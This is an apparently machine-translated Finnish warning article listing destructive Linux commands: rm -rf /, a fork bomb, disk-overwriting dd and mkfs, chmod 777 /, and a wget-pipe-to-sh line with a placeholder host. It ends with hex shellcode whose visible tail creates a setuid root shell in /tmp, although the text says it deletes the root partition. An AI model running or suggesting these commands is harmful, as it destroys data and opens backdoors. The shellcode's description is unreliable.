Vaarallisimmat komennot - Sinun ei pitäisi koskaan suorittaa Linuxissa


Komentorivikäyttöliittymä on tehokas ja kätevä apuohjelma Linux-järjestelmän hallintaan. Se tarjoaa nopean ja monipuolisen tavan käyttää järjestelmää, erityisesti hallittaessa päättömiä järjestelmiä, joissa ei ole graafista käyttöliittymää.

Vaikka komentorivi on hyödyllinen järjestelmän hallinnassa, se on täynnä riskejä. Huonojen komentojen suorittaminen voi aiheuttaa vahinkoa ja peruuttamattomia vaurioita järjestelmällesi. Tässä oppaassa olemme koonneet luettelon riskialttiimmista komennoista, joita sinun ei pitäisi ajatella suorittavan järjestelmässäsi.

1. rm -rf/komento

rm-komento on Linux-komento, jota käytetään tiedostojen ja hakemistojen poistamiseen käytetyistä argumenteista riippuen. Erityistä varovaisuutta tulee kuitenkin noudattaa käytettäessä rm-komentoa, sillä pieni kirjoitusvirhe tai virhe voi johtaa peruuttamattomiin järjestelmävaurioihin.

Kun komento suoritetaan pääkäyttäjänä valitsimella -rf /, komento poistaa rekursiivisesti kaikki järjestelmäsi tiedostot ja hakemistot alkaen juurista (/), joka on Linuxin korkein. Tiedostohierarkiarakenne. Lyhyesti sanottuna komento rm -rf / pyyhkii järjestelmäsi kokonaan pois, mikä johtaa rikkiin ja palautumattomaan järjestelmään.

Jotkut rm-komennon kanssa käytetyistä vaihtoehdoista ovat.

  • Linuxissa rm-komentoa käytetään tiedostojen poistamiseen.
  • rm -r-komento poistaa kansion rekursiivisesti, jopa tyhjän kansion.
  • Komento rm -f poistaa vain luku -tiedoston kysymättä.
  • rm -rf / : Pakota kaiken juurihakemiston poistaminen.
  • rm -rf * : Pakottaa poistamaan kaiken nykyisestä hakemistosta/työhakemistosta.
  • rm -rf . : Pakottaa nykyisen kansion ja alikansioiden poistaminen.

Itse asiassa, kun suoritat komennon tavallisena käyttäjänä, saat kaksi varoitusta terminaaliin.

Voit välttää tiedostojen tahattoman poistamisen rm-komennolla luomalla komennolle 'rm' aliaksen muodossa 'rm -i' .bashrc ”-tiedostoon, se pyytää sinua vahvistamaan jokaisen poiston.

2. :(){:|:&};: Komento

Yllä oleva on itse asiassa haarukkapommi. Se toimii luomalla funktion nimeltä ':', joka kutsuu itseään kahdesti, kerran etualalla ja kerran taustalla. Toiminto suoritetaan toistuvasti ja kuluttaa näin tehdessään kaikki järjestelmän resurssit, mikä johtaa järjestelmän kaatumiseen.

Itse asiassa haarukkapommi-komento on pohjimmiltaan eräänlainen DoS (Denial-of-Service) -hyökkäys. Sitä kutsutaan myös Wabbit- tai Rabbit-virukseksi. Pahinta on, että sinun ei tarvitse olla root aloittaaksesi tämän hyökkäyksen.

Onneksi voit suojautua tältä hyökkäykseltä rajoittamalla paikallisten käyttäjien suorittamien prosessien määrän noin 4000:een.

Voit tehdä tämän suorittamalla komennon:

ulimit -S -u 4000

Voit tarkistaa tämän myöhemmin komennolla:

ulimit -u

3. komento > /dev/sda

Komennon suorittaminen ja sen jälkeen >/dev/sda korvaa kiintolevyn /dev/sda-lohkon. Tämä lohko sisältää tiedostojärjestelmätietoja ja päällekirjoitettuna johtaa vaurioituneeseen järjestelmään, jota ei voida korjata.

4. mv-kansio /dev/null

Toinen haitallinen toimenpide, jota sinun ei pitäisi yrittää, on hakemiston tai tiedoston siirtäminen hakemistoon /dev/null. /dev/null-tiedosto on erityinen tiedostotyyppi, joka tunnetaan nimellä tyhjä laite tai "musta aukko". Kaikki, mikä siirretään kohtaan /dev/null, hylätään ja tuhotaan.

Seuraava komento siirtää käyttäjän kotihakemiston kaiken sisällön hakemistoon /dev/null, minkä seurauksena kaikki käyttäjän kotihakemiston sisältämät tiedot hylätään.

mv /home/user/* /dev/null

5. wget http://haitallinen_lähde -O- | sh

wget-komento on komento, joka lataa tiedostoja webistä tai tiedostopalvelimesta. Yllä oleva komento lataa komentosarjan haitallisesta lähteestä ja suorittaa sen sitten.

6. mkfs.ext3 /dev/sda

mkfs-komento luo uuden tiedostojärjestelmän (joko ext2, ext3, ext4 jne.) alustettuun tallennuslaitteeseen, useimmissa tapauksissa kiintolevyaseman osioon. mkfs-komennon suorittaminen osiolla pyyhkii kaikki siihen tallennetut tiedot.

Vaikka koko aseman alustaminen (kuten mkfs.ext3 /dev/sda) on hyödyllinen levyosien alustuksessa, se kaataa järjestelmän ja jättää sen peruuttamattomaan tilaan. Tämä tapahtuu, koska se tuhoaa kaikki järjestelmätiedostot henkilötietojesi ohella.

Komento voi olla myös muissa muodoissa alla esitetyllä tavalla.

mkfs.ext4 /dev/sda
mkfs.xfs /dev/sda
mkfs.btrfs /dev/sda

7. > tiedostokomento

>-tiedosto pyyhkii tiedoston sisällön ja jättää sen tyhjäksi. Se on synonyymi cat /dev/null > file-komennon kanssa. Siksi on oltava varovainen käytettäessä uudelleenohjausoperaattoreita Linux-järjestelmässä.

Alla on osoitus siitä, kuinka tämä komento korvaa tekstitiedoston. Voit kuvitella tämän komennon aiheuttaman katastrofin, kun kyseessä oleva tiedosto on asetustiedosto.

8. ^foo^bar

^foo^bar-komento on yhtä vaarallinen kuin hyödyllinen sen suoritustavasta riippuen. Vaikka sen avulla voit muokata aiemmin suoritettuja komentoja ja suorittaa ne uudelleen, se voi olla tuhoisaa, jos et ole kiinnostunut komentoihin tehdyistä muutoksista ennen niiden suorittamista.

9. dd if=/dev/random of=/dev/sda

Yllä oleva komento pyyhkii pois /dev/sda-lohkon ja kirjoittaa satunnaisia roskatietoja lohkoon. Järjestelmäsi jäisi epäjohdonmukaiseen ja peruuttamattomaan vaiheeseen.

10. Chmod -R 777 /

Vaikka se ei välttämättä kaada Linux-järjestelmääsi välittömästi, chmod -R 777 / -komento määrittää rekursiivisesti kaikki käyttöoikeudet (luku-, kirjoitus- ja suoritus-oikeudet) kaikille Linux-järjestelmäsi tiedostoille juuresta alkaen.

Tämä paljastaa tehokkaasti kaikki tärkeät määritystiedostot ja muut tiedostot kaikille käyttäjille, mikä aiheuttaa valtavan tietoturvariskin järjestelmällesi. Jokainen, jolla on pahat aikeet, voi käsitellä tärkeitä tiedostoja ja rikkoa järjestelmän helposti.

11. Piilotettu komento

Alla oleva komento on vain ensimmäinen komento (rm -rf) yläpuolella. Täällä koodit on piilotettu hex-muotoon, jotta tietämätön käyttäjä voi huijata. Alla olevan koodin suorittaminen terminaalissa pyyhkii juuriosiosi.

Tämä komento osoittaa, että uhka saattaa olla piilotettu eikä normaalisti havaittavissa joskus. Sinun on oltava tietoinen siitä, mitä olet tekemässä ja mikä olisi lopputulos. Älä käännä/ajaa koodeja tuntemattomasta lähteestä.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Huomaa: älä suorita mitään yllä olevista komennoista Linux-päätelaitteessa tai -kuoressa tai ystäväsi tai koulusi tietokoneessa. Jos haluat testata niitä, suorita ne virtuaalikoneessa.

Kaikki yllä olevan komennon suorittamisen aiheuttamat epäjohdonmukaisuudet tai tietojen menetys hajottavat järjestelmäsi, mistä ei artikkelin Kirjoittaja eikä Tecmint ole vastuussa.

Tässä kaikki tältä erää. Tulen pian tänne jälleen ja kerron toisen mielenkiintoisen artikkelin, jota ihmiset rakastavat lukea. Siihen asti Pysy kuulolla ja ole yhteydessä Tecmintiin.

Jos tiedät muita tällaisia vaarallisia Linux-komentoja ja haluat meidän lisäävän ne luetteloon, kerro siitä meille kommenttiosion kautta ja älä unohda antaa arvokasta palautetta.